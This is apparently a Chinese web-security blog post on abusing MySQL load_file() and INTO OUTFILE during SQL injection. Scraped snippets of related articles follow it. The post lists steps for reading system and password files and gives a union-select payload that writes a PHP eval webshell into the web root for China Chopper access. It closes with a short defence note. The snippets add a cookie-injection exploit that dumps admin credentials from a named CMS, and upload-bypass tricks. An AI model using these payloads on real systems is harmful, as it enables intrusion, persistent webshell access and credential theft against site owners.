web安全之sqlload_file()和into outfile()

load_file()

  条件:要有file_priv权限

     知道文件的绝对路径

     能使用union

     对web目录有读权限

  如果过滤啦单引号,则可以将函数中的字符进行hex编码

步骤:

  1.读/etc/init.d下的东西,这里有配置文件路径。

  2.得到web的安装路径

3.读取密码文件

into outfile

条件:

  1。要有file_priv权限

  2.知道网站的绝对路径

  3.对web有写的权限

  4.没有过滤单引号

步骤:

直到网站的绝对路径的时候:

  ?id=1 union select "<?php @eval($_POST[‘c‘]); ?>" into
 outfile("网站根目录")

相当于:

use test;  选择数据库为test
create table aaa(bbb varchar(64));   在数据库中创建一个表aaa
insert into aaa values("<?php @eval($_POST[‘c‘]);?>");   在aaa中插入一条数据<?php @eval($_POST[‘c‘]);?>
select * from aaa into outfile ‘C:/phpStudy/WWW/a.php‘;  将aaa中的数据导出到文件a.php
drop aaa;  //删除建立的表

用菜刀练接;

防御:  数据库连接帐号不能用root权限  php关闭报错模式  mysql帐号没有对权限对网络根目录有写的权限


 
时间: 2024-08-08 05:21:05

web安全之sqlload_file()和into outfile()的相关文章

mysql基础语法及拓展到web中的sql注入

本来是想写下javaweb的mvc(tomcat, spring, mysql)的搭建,  昨天搭到凌晨3点, 谁知道jdbcTemplate的jar包不好使, 想死的心都有了, 想想还是休息一下, 所以复习一下mysql的基本语法,因为以前对web的安全比较熟悉, 看过好多黑客防线以及黑客X档案, 黑锅几家网吧,你懂的, o(^▽^)o, 所以拓展一下web安全, 常见web注入的方式, 以及找的两篇资料: 首先复习一下基本的增删改查: //从Users表中删除User为admin的字段; d

【web安全】第六弹:手工SQL注入详解

前一段时间,在对SQL注入有了新的理解之后,写了这篇文章.本来准备投稿,因为内容过于基础被打回来了,想想屯着也没意思,发出来发出来~~本来有好多图的,但是博客园发图很麻烦,word文档的链接会贴在文章最后面,有兴趣的可以下载下来看. 注:本文目标读者是对SQL注入有一定了解,能使用一些工具(SQLMAP.pangolin等)进行自动化SQL注入测试,又想了解工具原理和SQL注入原理的童鞋. 0x00 基础理论篇 0x01 注入技巧&基本模式: 首先,要对下面的一些函数和基本语句有一定的了解. 1

WEB下渗透测试经验技巧(全)[转载]

Nuclear’Atk 整理的: 上传漏洞拿shell: 1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现.例:*.asp ,*.asp...3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用).4.gif文件头欺骗5.同名重复上传也很OK.: 入侵渗透中用到的命令,语法: set,systeminfo,ipconfig,ping,利用这些命令可以收

浅谈php web安全

首先,笔记不是web安全的专家,所以这不是web安全方面专家级文章,而是学习笔记.细心总结文章,里面有些是我们phper不易发现或者说不重视的东西.所以笔者写下来方便以后查阅.在大公司肯定有专门的web安全测试员,安全方面不是phper考虑的范围.但是作为一个phper对于安全知识是:“知道有这么一回事,编程时自然有所注意”. 概要: 1.php一些安全配置 (1)关闭php提示错误功能 (2)关闭一些“坏功能” (3)严格配置文件权限. 2.严格的数据验证,你的用户不全是“好”人 2.1为了确

自定义开发的系统整合 office Web apps

Office文档的web应用叫WOPI Host或者WOPI Server. 把查看编辑操作Office文档的web应用叫WOPI Client或者叫WOPI applications. 所以,Office Web Apps充当的就是WOPI Client的角色. SharePoint,Exchange,自己开发的文档管理系统充当的就是WOPI Host的角色. 再看一下,浏览器,server,client三者的请求顺序及关系 其实网上有关office web app的整合已经有相关的文章了

Asp.net与office web apps的整合

事实上网上有关office web app的整合已经有相关的文章了,典型的是怎样整合Office Web Apps至自己开发的系统(一) 和怎样整合Office Web Apps至自己开发的系统(二),微软官网也有对应的demo. 这里在简单描写叙述一下原理吧:office web apps(owas)扮演者一个客服端,它会訪问我们asp.net 网站的文件然后呈现出来.而我们经常使用的API主要有例如以下3个: GET api/wopi/files/{name}?access_token={a

java代理实现domino web邮件下载

[背景] 近日在研究domino web邮件下载功能,下载的邮件可以导入foxmail.outlook邮件客户端,下载的邮件格式为eml. [参考代码](需要下载jmail.jar包) private void makeEml(String unid) { Document memo=null; RichTextItem body=null; try { memo = maildb.getDocumentByUNID(unid); String mailtime=((String) memo.g

实战小项目之基于yolo的目标检测web api实现

上个月,对微服务及web service有了一些想法,看了一本app后台开发及运维的书,主要是一些概念性的东西,对service有了一些基本了解.互联网最开始的构架多是cs构架,浏览器兴起以后,变成了bs,最近几年,随着移动互联网的兴起,cs构架再次火了起来,有了一个新的概念,web service. 最近两天,想结合自己这段时间学的东西,实现一个cs构架的service接口.说一下大体流程,client上传图片到http服务器,http后台使用yolo进行图片的检测,之后将检测结果封装成jso

常用的主流WEB漏洞,EXP合集

启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));test:http://www.hackernc.com/system/xitong/shownews.asp?id=210-----------------